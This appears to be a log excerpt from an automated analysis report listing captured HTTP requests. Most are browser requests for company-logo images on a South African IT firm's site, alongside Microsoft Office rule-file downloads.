          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/is..jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/city-of-cape-town.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/mediclinic.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/chevron.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/mmi-holdings.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/cape-union-mart.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/nec.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/petrosa.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/cape-nature.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/building-industry.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/meat-market.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/axis.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/cherwell.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/trend.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/cisco.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/is..jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/mediclinic.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/print-audit.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/mmi-holdings.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/dell.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/nec.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/petrosa.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/palo-alto.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/meat-market.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/dellemc.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/microsoft.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/ibm.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/cherwell.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/trend.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/cisco.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/hp.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/DIMENSION.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/print-audit.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/dell.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/BYTES.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/palo-alto.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/11/yeastar.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/dellemc.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/microsoft.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/ibm.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/hp.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
